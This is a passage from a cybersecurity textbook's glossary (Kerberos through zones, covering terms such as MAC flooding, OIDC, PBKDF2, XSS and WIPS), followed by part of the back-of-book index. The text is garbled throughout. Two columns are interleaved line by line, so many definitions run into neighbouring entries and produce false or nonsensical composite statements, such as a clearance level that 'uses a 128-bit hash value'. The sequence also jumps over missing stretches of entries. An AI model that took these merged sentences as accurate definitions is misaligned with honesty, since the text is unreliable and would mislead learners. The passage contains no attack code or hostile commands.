non-proprietary standards that are used to boredom, and improve professional skills.
secure data through authentication and
encryption as the data travels across the Kerberos
network or the Internet. An authentication service that is based on
a time-sensitive ticket-granting system.
ISA
(interconnection security agreement) A key
business agreement that focuses on A specific piece of information that is used
ensuring security between organizations in in conjunction with an algorithm to
a partnership. Any federal agency perform encryption and decryption.
interconnecting its IT system to a third
party must create an ISA to govern the key exchange
relationship. An ISA sets out a security risk Any method by which cryptographic keys
awareness process and commits the are transferred among users, thus
agency and supplier to implementing enabling the use of a cryptographic
security controls. algorithm.
(subjects) are allocated a clearance level which uses a 128-bit hash value. It is used
(or label). in IPSec policies for data authentication.
MAC MDM
(Message Authentication Code) A means of (Mobile Device Management) Software
proving the integrity and authenticity of a suites designed to manage use of
message. smartphones and tablets within an
enterprise.
MAC address
(Media Access Control address) A unique media sanitization
hardware address hard-coded into a The process of decommissioning storage
network adapter. This provides local media, including hard drives, flash drives/
addressing on Ethernet and Wi-Fi SSDs, tape media, CD and DVD ROMs, and
networks. A MAC address is 48 bits long so on.
with the first half representing the
manufacturer's organizationally unique member server
identifier (OUI). Any Windows-based server computer
configured into a domain but not
MAC filtering maintaining the Active Directory database
(media access control filtering) Applying an (authenticating users) is referred to as a
access control list to a switch or access member server. Servers in a workgroup
point so that only clients with approved are referred to as standalone servers.
MAC addresses can connect to it.
memory leak
MAC flooding A software vulnerability that can occur
A variation of an ARP poisoning attack when software does not release allocated
where a switch's cache table is inundated memory when it is done using it,
with frames from random source MAC potentially leading to system instability.
addresses.
message digest
MAC spoofing See hash.
An attack in which an attacker falsifies the
factory-assigned MAC address of a device's Metasploit Framework
network interface. A platform for launching modularized
attacks against known software
mandatory vacations vulnerabilities.
A requirement that employees are forced
to take their vacation time, during which MitB
someone else fulfills their duties. (Man-in-the-Browser) An attack when the
web browser is compromised by installing
mantrap malicious plug-ins or scripts, or
A secure entry system with two gateways, intercepting API calls between the browser
only one of which is open at any one time. process and DLLs.
also set out limited warranties and something you have, and something you
support arrangements. are.
MTTR Nessus
(Mean Time to Repair/Replace/Recover) One of the best-known commercial
The average time taken for a device or vulnerability scanners, produced by
component to be repaired, replaced, or Tenable Network Security.
otherwise recover from a failure.
netstat
multifactor authentication Utility to show network information on a
An authentication scheme that combines machine running TCP/IP, notably active
the requirements of something you know, connections and the routing table.
offboarding OS hardening
The process of ensuring that all HR and The process of making the OS
other requirements are covered when an configuration secure by enabling and
employee leaves an organization. allowing access to only necessary services,
installing monitoring software to protect
offline CA against malware and intrusions, and
(offline certificate authority) In PKI, a CA establishing a maintenance schedule to
(typically the root CA) that has been ensure the OS is patched to be secure
disconnected from the network to protect against software exploits.
it from compromise.
OSINT
OIDC (Open Source Intelligence) Publicly
(OpenID Connect) An authentication layer available information and tools for
that sits on top of the OAuth 2.0 aggregating and searching it.
authorization protocol.
OTP
onboarding (One-time Password) A password that is
The process of bringing in a new generated for use in one specific session
employee, contractor, or supplier. and becomes invalid after the session
ends.
one-time pad
A cryptographic key that is the same OWASP
length as what is being encrypted, and (Open Web Application Security Project) A
used only once. It also has no relationship charity and community publishing a
to other keys that are issued, so no pattern number of secure application
can be established or broken. development resources.
online CA P2P
(online certificate authority) In PKI, a CA (peer-to-peer) File sharing networks where
that is available to accept and process data is distributed around the clients that
certificate signing requests, publish use the network. Apart from consuming
certificate revocation lists, and perform bandwidth and disk space, P2P sites are
other certificate management tasks. associated with hosting malware and
illegal material.
open relay
A type of mail server that is configured so PaaS
that anyone can use the server to send (Platform as a Service) A computing
mail. method that uses the cloud to provide any
platform-type services.
OpenID
An identity federation method that packet filtering
enables users to be authenticated on A Layer 3 firewall technology that
cooperating websites by a third-party compares packet headers against ACLs to
authentication service. determine which network traffic to accept.
patch PFS
A small unit of supplemental code meant (perfect forward secrecy) A characteristic
to address either a security problem or a of session encryption that ensures if a key
functionality flaw in a software package or used during a certain session is
operating system. compromised, it should not affect data
previously encrypted by that key.
patch management
Identifying, testing, and deploying OS and PGP
application updates. Patches are often (Pretty Good Privacy) A method of securing
classified as critical, security-critical, emails created to prevent attackers from
recommended, and optional. intercepting and manipulating email and
attachments by encrypting and digitally
PBKDF2 signing the contents of the email using
(Password-Based Key Derivation Function public key cryptography.
2) A key derivation function used in key
stretching to make potentially weak PHI
cryptographic keys such as passwords less (protected health information) Information
susceptible to brute force attacks. that identifies someone as the subject of
medical and insurance records, plus
PCI DSS associated hospital and laboratory test
(Payment Card Industry Data Security results.
Standard) Information security standard
for organizations that process credit or phishing
bank card payments. A type of email-based social engineering
attack, in which the attacker sends email
PEAP from a supposedly reputable source, such
(Protected Extensible Authentication as a bank, to try to elicit private
Protocol) Similar to EAP-TLS, PEAP is an information from the victim.
open standard developed by a coalition
made up of Cisco Systems, Microsoft, and physical access controls
RSA Security. Controls that restrict, detect, and monitor
access to specific physical areas or assets
SABSA schema
(Sherwood Applied Business Security A set of rules in a directory service for how
Architecture) A methodology for providing objects are created and what their
information assurance aligned to business characteristics can be.
needs and driven by risk analysis.
screen filter
salt See privacy filter.
A security countermeasure that mitigates
the impact of a rainbow table attack by screened host
adding a random value to ("salting") each A dual-homed proxy/gateway server used
plaintext input. to provide Internet access to other
network nodes, while protecting them
SAML from external attack.
(Security Assertion Markup Language) An
XML-based data format used to exchange SDLC
authentication information between a (Software Development Lifecycle) The
client and a service. processes of planning, analysis, design,
implementation, and maintenances that
SAN often govern software and systems
(Storage Area Network) A network development.
dedicated to data storage, typically
consisting of storage devices and servers SDN
connected to switches via host bus (software defined networking) A software
adapters. application for defining policy decision on
the control plane.
SANS Institute
(SysAdmin, Network, and Security Institute) SECaaS
A company that specializes in (Security as a Service) A computing
cybersecurity and secure web application method that enables clients to take
development training and that sponsors advantage of information, software,
the Global Information Assurance infrastructure, and processes provided by
Certification (GIAC). a cloud vendor in the specific area of
computer security.
SATCOM
(satellite communications) Services such as secure boot
voice and video calling, Internet access, A UEFI feature that prevents unwanted
faxing, and television and radio processes from executing during the boot
broadcasting. operation.
spam SSTP
Junk messages sent over email (or instant (Secure Socket Tunneling Protocol) A
messaging, which is called spim). protocol that uses the HTTP over SSL
protocol and encapsulates an IP packet
spectrum analyzer with a PPP header and then with an SSTP
A device that can detect the source of header.
interference on a wireless network.
stackable
SPoF A feature of some network switches that
(single point of failure) A component or enables them to be connected together to
system that would cause a complete act as a group.
interruption of a service if it failed.
state table
spoofing Information about sessions between hosts
An attack technique where the attacker that is gathered by a stateful firewall.
disguises their identity.
stateless
spyware A type of firewall that does not preserve
Software that records information about a information about the connection
PC and its users, often installed without between two hosts. Often used to describe
the user's consent. packet-filtering firewalls.
TOS tunneling
(trusted operating system) The operating The practice of encapsulating data from
system component of the TCB that one protocol for safe transfer over another
protects the resources from applications. network such as the Internet.
TOTP tuples
(Time-based One-time Password) An In a firewall rule, a related set of
improvement on HOTP that forces one- parameters that describe the rule and the
time passwords to expire after a short traffic it is designed to allow or block.
period of time.
turnstile
TPM A type of gateway that only allows one
(Trusted Platform Module) A specification person through at a time.
for hardware-based storage of digital
certificates, keys, hashed passwords, and Twofish
other user and platform identification A symmetric key block cipher, similar to
information. Blowfish, consisting of a block size of 128
bits and key sizes up to 256 bits.
traffic filtering
The basic function of a firewall, comparing typosquatting
network traffic to established rules, and See URL hijacking.
preventing access to messages that do not
conform to the rules. UAC
(User Access Control) A security system in
transposition cipher Windows that is designed to restrict abuse
The units stay the same in plaintext, but of accounts with administrator privileges.
the order is changed according to some
mechanism. UEFI
(Unified Extensible Firmware Interface) A
trapdoor functions type of system firmware providing support
Mathematical ciphers that use an for 64-bit CPU operation at boot, full GUI
operation which is simple to perform one and mouse operation at boot, and better
way when all of the values are known, but boot security.
is difficult to reverse.
updates
TRNG Software revisions that are made freely
(true random number generator) A available by the software manufacturer to
method of generating random values by fix problems in a particular software
sampling physical phenomena that has a version, including any security
high rate of entropy. vulnerabilities.
UTM VM
(unified threat management) All-in-one (virtual machine) A guest operating system
security appliances and technologies that installed on a host computer using
combine the functions of a firewall, virtualization software (a hypervisor), such
malware scanner, intrusion detection, as Microsoft Hyper-V or VMware.
vulnerability scanner, Data Loss
Prevention, content filtering, and so on. VoIP
(Voice over Internet Protocol) A protocol
VDE that enables carrying voice traffic over
(Virtual Desktop Environment) A VM that data networks.
runs a desktop operating system.
VPN
VDI (Virtual Private Network) A secure tunnel
(Virtual Desktop Infrastructure) A created between two endpoints connected
virtualization implementation that via an unsecure network (typically the
separates the personal computing Internet).
environment from a user's physical
computer. VPN concentrator
A single device that incorporates advanced
version control encryption and authentication methods in
The practice of ensuring that the assets order to handle a large number of VPN
that make up a project are closely tunnels.
managed when it comes time to make
changes. VT
(virtualization technology) Software
video surveillance allowing a single host computer to run
A physical security control that uses multiple "guest" operating systems, or
cameras and recording devices to visually virtual machines (VMs).
monitor the activity in a certain area.
vulnerability
VIP address A weakness that could be triggered
(virtual Internet Protocol address) An IP accidentally or exploited intentionally to
address that is assigned to multiple cause a security breach.
domain names or servers, rather than to a
single NIC, to support load balancing. vulnerability scanner
Software configured with a list of known
virtualization weaknesses and exploits and can scan for
The process of creating a simulation of a their presence in a host OS or particular
computing environment, where the application.
virtualized system can simulate the
hardware, operating system, and WAF
applications of a typical computer without (web application firewall) A firewall
being a separate physical computer. designed specifically to protect software
running on web servers and their backend
virus databases from code injection and DoS
Code designed to infect computer files (or attacks.
disks) when it is activated.
war driving
VLAN The practice of using a Wi-Fi sniffer to
(virtual local area network) A logically detect WLANs and then either making use
separate network, created by using of them (if they are open/unsecured) or
switching technology. Even though hosts trying to break into them (using WEP and
on two VLANs may be physically connected WPA cracking tools).
to the same cabling, local traffic is isolated
to each VLAN so they must use a router to warm site
communicate. A location that is dormant or performs
noncritical functions under normal
WIDS XOR
(wireless intrusion detection system) A (exclusive OR) An operation that outputs to
type of NIDS that scans the radio true only if one input is true and the other
frequency spectrum for possible threats to input is false.
the wireless network, primarily rogue
access points. XSRF
(Cross-Site Request Forgery) A malicious
WIPS script hosted on the attacker's site that can
(wireless intrusion prevention system) An exploit a session started on another site in
active, inline security device that monitors the same browser.
suspicious network and/or system traffic
on a wireless network and reacts in real XSS
time to block it. (Cross-Site Scripting) A malicious script
hosted on the attacker's site or coded in a
wireless controller link injected onto a trusted site designed
A device that provides wireless LAN to compromise clients browsing the
management for multiple APs. trusted site, circumventing the browser's
security model of trusted zones.
wireshark
A widely used packet analyzer.
zero-day exploit
An attack that exploits a vulnerability in
software that is unknown to the software
vendor and users.
zone
In networking, an area of a network where
the security configuration is the same for
all hosts within it. In physical security, an
area separated by barriers that control
entry and exit points.
T U
TACACS 239 UAC 257
tailgating 20 UC 550
tasting 491 UEFI 442
Telnet 528 Unified Communications, See UC
Temporal Key Integrity Protocol, See Unified Extensible Firmware Interface,
TKIP See UEFI
Terminal Access Controller Access- unified threat management, See UTM
Control System, See TACACS Uniform Resource Locator, See URL
TFTP 542 uptime 593
TGS 208 URL 536
TGT 208 URL hijacking 491
thin AP 406 USB On The Go, See USB OTG
threat actors 8 User Account Control, See UAC
threat assessment 583 user accounts 254
threats 7 USP OTG 466
thresholds 398 UTM 377
Ticket Granting Service, See TGS
Ticket Granting Ticket, See TGT V
Time-based One-time Password, See
TOTP VDE 566
TKIP 412 VDI 460, 565
TLS 503, 537 vendor diversity 49
tokens 222 version control 644
topology 294 VIP 355
TOS 440 Virtual Desktop Environment, See VDE
TOTP 224 Virtual Desktop Infrastructure, See VDI
TPM 180 Virtual IP, See VIP
traffic filtering 340 virtualization 294
Transport Layer Security, See TLS virtual LANs, See VLANs
transposition ciphers 136 Virtual Private Network, See VPN
trapdoor functions 137 viruses 25
Trivial File Transfer Protocol, See TFTP vishing 21
TRNG 140 VLANs 293, 302
Trojan horse 27 Voice over IP, See VoIP
See also Trojans VoIP 548
Trojans 27 VPN
true random number generator, See clients 510
TRNG client security 511
Trusted OS, See TOS VPN concentrators 509
Trusted Platform Module, See TPM vulnerabilities 7
trust models 183 vulnerability scanners 115
trust relationships 240 vulnerability scanning 68
tunneling 502
tuples 349 W
turnstiles 427 WAFs 345
Twofish 147 waterfall model 641
typosquatting 491 watering hole attack 22
weak keys 139
web application firewalls, See WAFs
X
X.500
directory information tree 236
distinguished names 236
XML 241
XOR operation 137
XSRF 631
XSS 629
Z
zero-day exploit 626
zombies 352
zones 294, 425